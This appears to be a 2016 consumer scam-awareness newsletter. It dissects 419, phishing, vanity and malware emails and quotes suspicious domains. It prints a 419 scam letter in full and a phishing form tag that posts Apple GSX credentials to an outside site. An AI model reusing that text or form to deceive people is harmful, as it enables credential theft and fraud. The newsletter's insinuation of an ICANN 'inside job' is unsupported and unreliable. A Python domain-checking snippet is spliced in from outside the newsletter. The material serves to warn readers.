
June 8, 2016

THE WEEK IN REVIEW

A couple of reminders to our readers. Scammers continue to use social engineering tricks disguised as political emails about Donald Trump. We most often see these malicious emails disguised as “CNN Reports” such as this one with the subject line Trump drops a BOMB.


Can you recognize “advance fee” scams? There are many varieties of them, but the most common are the “419 scams,” named after the section of the Nigerian Penal Code that covers the fraud they originated from. In summary, someone is going to send you money, but you have to pay small fees first to receive the funds. Of course, the promise of money is a lie. While we think folks have to be incredibly gullible to fall for these scams, history has demonstrated that even some of the most intelligent and professional people are that gullible. Thousands of these scams are emailed weekly to Americans. Here’s a small list of them showing the subject lines and sender addresses hitting one email server:


This 419 scam recently landed in our inbox. Enjoy!

From: alexdoku1@gmail.com
Time: 2016-05-30 11:24:43
Subject: Re: MORE DETAILS!!!

Dear Beneficiary,

My name is ( DAVID ABRAHAMOVICH ). I am a diplomatic investigation representative officer assigned for your long time beneficial intinerary procurement and immediate release of your consignment.

Kindly be inform that your deposited fund ($25-Million USD) of yellowed diplomatic tag Vaults has been released for immediate shipment and delivery to name and address.

Please contact the Diplomat Agent whose name and address appeared below for more details. In addition i will want you to kindly Re-confirm

  1. Your Full Name
  2. Current Home Address
  3. Nearest Airport
  4. Your Direct Cell Phone # So that he can make open a direct communication for your quicker arrangement for the delivery of the consignment to your home address.

Once again you should re-confirm your contact details to him immediately as directed:

Name: Mr Saad Al-Jamal
Email: saadaljama47@gmail.com

Best regards
DAVID ABRAHAMOVICH


Sample Scam Subject Lines:

New Position Open with Fortune 100 Company – Your hired
Approved sex pills
Apps for mobile phones
Auto repair stores
Cash Back Credit Cards 2016
Check out these money saving restaurant offers
Coupons for Dining Out
Explore options for reverse mortgage
Fix your golf game
Get your vehicle running like new again!
Put your money to work by investing in annuities today
Reduce your carbon footprint
Trump did it again – CNN Report

Sample Scam Email Addresses:

1inkoffer@inko.date
CarRentalDiscounts@9qu9.download
CheapContactLenses@lyob.download
DreamCars@carsexotic.download
HomeSecurityReviews@q9t0.download
info@overweightmelter.com
LifeInsurance@kingsingledating.top
manageheartburn@plainrelf.pro
RestaurantDeals@enjoycopn.top
SingleParentDatingServices@kingsingledating.top
survivecancer@cancerrealese.date
TAXLawyers@trarient.download
WillsandTrusts@smgp.download


Phish NETS: Apple iTunes Receipt, DropBox, and Apple GSX Account

This Apple phishing scam is your worst nightmare because it is so brilliantly crafted. Unlike most phishing scams pretending to be an account login notification, this email appears to be a receipt for a purchase for an Apple iTunes film rental in CAD (Canadian dollars). The recipient is asked if they have “issues with this transaction?” “If you haven’t authorized this transaction ,click the link below to get a full refund.”

The link isn’t hidden, but it is obfuscated. It begins with “senderapps-user” and also contains a folder named “canadaappleitunesinfostore” and a file named “secureinfoapple.html.” These are meant to trick the recipient into thinking this is a link to a secure Apple iTunes website in Canada. It is not. The actual domain in this link is from-pa.com; “senderapps-user” is a sub-domain. Anyone who controls a domain can create a sub-domain using any text, or a file of any name. Sub-domain and file names don’t mean that they represent the real company! To help you understand domain names and what to pay attention to, visit our article Learn to Surf Safely by Understanding Website Domain Names.

Let’s look more closely at the domain from-pa.com. Google cannot find any website of that name. A WHOIS lookup of this domain shows that it is owned by a legitimate company called Dyn (Dynamic Network Services). The domain was hacked and is now hosting a phishing site. We’ve informed Dyn. Our advice for readers: before reacting emotionally and too quickly to a false charge, look carefully at the sender’s email address AND the link you are about to click.

Then delete.

[Image: Apple iTunes receipt phishing email]

This next email wants you to believe it came from DropBox when, in fact, it is a phishing scam for your Dropbox credentials. It is not from DropBox.com even though the email’s “from” address says no-reply@dropboxmail.com. The address is being spoofed. The link from View Folder points to a hacked toy website in Russia called toy-moy.ru. VirusTotal.com cites no fewer than seven security services identifying this link as malicious and phishing!

The phishers are back to their old tricks, targeting those who repair Apple computers and are “GSX” certified. Take the email below, sent from gsx_notification@update.com with the subject line “inactivity of your account.” That isn’t from Apple.com. The email contains a clever web file titled “Verify_Form.shtml.” We’ve written about these many times in the past. The shtml file recreates the look and feel of the Apple GSX account information form, which the user is asked to update. However, instead of sending this information to Apple, the form’s “post” action shows that the information is sent to a strange website called arogant.bz:

<form id="command" name="form1" action="http://arogant.bz/aci.php" method="post" onsubmit="return submitOnce(event); setFDC();">

A WHOIS lookup of arogant.bz shows that the site was registered on May 30 and is being hosted in Russia. Definitely not Apple.
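The two checks described above (which domain really owns a link, and where a form’s “post” action actually sends your data) as an added example that is not from The Daily Scam. The full iTunes link is reconstructed from the fragments quoted above and the suffix set is a tiny stand-in for the real Public Suffix List; both are assumptions.

```python
# Added example (not from the newsletter): find the domain that really controls
# a phishing link or a form's "action" target, ignoring sub-domains and paths.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tiny stand-in for the Public Suffix List (assumption: real code would load it).
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def registrable_domain(url: str) -> str:
    """Return the registered domain of a URL, e.g. from-pa.com, since anyone
    controlling it can pick any sub-domain, folder or file name they like."""
    host = (urlparse(url).hostname or "").rstrip(".").lower()
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


class FormActionFinder(HTMLParser):
    """Collect the action URL of every <form> tag (HTMLParser lowercases names)."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions += [v for k, v in attrs if k == "action" and v]


def form_action_domains(html: str) -> list:
    parser = FormActionFinder()
    parser.feed(html)
    return [registrable_domain(a) for a in parser.actions]


def posts_offsite(html: str, expected_domain: str) -> bool:
    """True if any form submits somewhere other than the brand's own domain."""
    return any(d != expected_domain.lower() for d in form_action_domains(html))


# Constructed inputs: the iTunes link is reconstructed from the fragments in the
# text (assumption); the form tag is the one quoted from the GSX phish.
ITUNES_LINK = ("http://senderapps-user.from-pa.com/"
               "canadaappleitunesinfostore/secureinfoapple.html")
GSX_FORM = ('<form id="command" name="form1" action="http://arogant.bz/aci.php" '
            'method="post" onsubmit="return submitOnce(event); setFDC();">')

if __name__ == "__main__":
    print(registrable_domain(ITUNES_LINK))       # from-pa.com
    print(posts_offsite(GSX_FORM, "apple.com"))  # True
```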

Delete!

Your Money: Credit Card Options and Benefits, Baby Formula, and Designer Glasses

We’re seeing a lot of malicious emails disguised as offers for credit card options like the two below: “All of the Credit, None of the Interest” and “Check out the benefits that Credit Cards have to offer and pick the best.” The first email comes from the strange website hhdiwo.download, which was registered on May 31 by someone named Hatton Garden from London, GB. The second email makes no effort to disguise the crazy links or the spammy text. (The spammy text was actually copied from a March 2015 essay on a fish recognition and classification system published on UKEssays.com.) Perhaps the scammers think that their domain CreditCareLove.com is enough to put aside any recipient’s suspicions. We have bad news about CreditCareLove.com. The domain was registered on June 2 by our archenemy Judy Santiago using Enom.com, and it is being hosted in the Netherlands. Deeeleeete! (We’ve written about Judy’s malicious emails in four recent newsletters: April 13 and 20; May 11 and 18.)

[Image: credit card benefits scam emails]

This is a first! We’ve never seen scams targeting mothers with newborns. How low will these scammers go? They routinely prey upon the sick, the poor, the addicted…. And now a new low: they prey upon mothers looking for healthy baby formula choices. “Considering Formula for Your Baby?” Here are search results for Healthy Baby Formula. The link leads to the domain uteuti.download. This domain was registered by our new friend in London named Hatton Garden. (A Google search informs us that “Hatton Garden” is a London jeweler, also a safe deposit company, and also the name of a street in London.) The domain was registered less than five hours before the email was sent, using the heavily abused service called Alpnames.com.

Delete!


Are you interested in designer eyeglasses? Let’s cut to the point and tell you that you won’t find them on this website named herbsuccessforyou.com.

Delete.


TOP STORY: Revisiting Vanity Scams – Who’s Who and Whatever This Is

Vanity scams are meant to appeal to the recipient’s ego: he or she is invited to join an “elite group of professionals” or receives some other ridiculous invitation. The classic vanity scam is an invitation to join a professional “Who’s Who” of Who-dom. Like some reverse Batesian mimicry, some of these scams are actually not meant to trick you into purchasing a useless certificate or directory with the names of all the people who wasted their money like you did. Some of these vanity scams are actually malicious and meant to infect your computer. Can you tell which each of the scams below is: the vanity scam or the malicious mimic?

“You’ve Been Accepted by Professional Who’s Who”

Dear , It is my pleasure to inform you that you may qualify for inclusion in the 2016 Professional Who’s Who Network.

On behalf of our Committee I salute your achievement and welcome you to our organization.

They don’t even know your name, but they salute your achievement? This scam is the malicious mimic. The top-level domain gdn was only just made available by ICANN on March 16, 2016. We checked the ICANN registry for the domain oanight.gdn that was used in this scam email, and ICANN tells us that it was not registered! Look for yourself: http://www.nic.gdn/whois.php We don’t even know HOW it is possible for criminals to misuse a new domain that ICANN itself says is not registered with Internet name servers. (ICANN is the governing body for Internet names.) Could this be evidence of some kind of inside job connecting an ICANN employee to the criminal gangs? Can we call the FBI to investigate? No, because the ICANN-licensed company controlling all GDN top-level domains is located in Dubai, United Arab Emirates. Where the heck are the Internet police when you need them? Oh, we just remembered. They don’t exist.

Deeeleete!

And then there is this very curious vanity scam from 884d058d@gppdev.com: “Your social networking reputation has pre-qualified you to register with us…” It was sent to someone whose social networking reputation is about as high as cow pasture meadow muffins. And what makes them think that we want to associate with them anyway? Who are they exactly?

Your reputation on social networking sites like LinkedIn, Facebook and others entitle you for acceptance!

Complete our simple and short>complimentary application form and soon you’ll have access to the world’s top-rated network of pros, business people, top- and mid-level execs, entrepeneurs, and others looking to make a difference and enjoy success.

Read what is included in this offer below. It includes “exposure of yourself” and other valuable…. Things. And they really want you to join whatever this is because they give you no less than five links to finish your application!

The domain gppdev.com was registered long ago in 2011 using a privacy protection service in Canada so we’ll never know who’s behind this… Whatever this is. But if you want to “meet new friends and contacts,” have at it. Otherwise, all together we say….

Footnote: The email above includes “Email courtesey of Electronic Marketing Group” from Lakewood, CO. Besides the fact that they cannot spell courtesy properly, we wanted to remind readers that we exposed Electronic Marketing Group as a bogus company in our April 20 and April 27 newsletters.

FOR YOUR SAFETY: I’ve Shared a File, Shipment Delivery Problem, and a New Message From Your Bank Manager

During the last week we have seen the impact of hacking and misuse of email servers and accounts from a school and two organizations, such as this one located in Gloucester, MA. The value of such malicious hacking is huge! An email from someone you know, especially a school or valued non-profit, is more likely to be trusted and to result in the recipient clicking the malicious link. This email, for example, with the subject line “View Document,” leads the recipient to believe that the link is for a Google document. However, the link leads to a website named haoqin87.com. The website represents a Ph.D. candidate in computer graphics located in China. His website has been hacked and now hosts malware. It pays to mouse over links and look before you click.

“We could not deliver your parcel. Please, open email attachment to print shipment label.” What they meant to say is “please open email attachment so we can infect your computer.”

[Image: shipment delivery problem email]

This email, sent from a server in Bosnia and Herzegovina (2-letter country code = .ba), is a simple attempt to trick you into opening the malware inside the attached zip file. It was not sent from your bank manager!

[Image: new message from bank manager email]

ON THE LIGHTER SIDE: Delivery of Your Debit Card

Dear TDS readers. We’re thinking about hanging up the fight for a safer Internet now that we’ve received this awesome offer from Kmart. And we weren’t even looking! However, this is too good to let go.

[Image: job offer from Kmart email]

Until next week (maybe?), surf safely!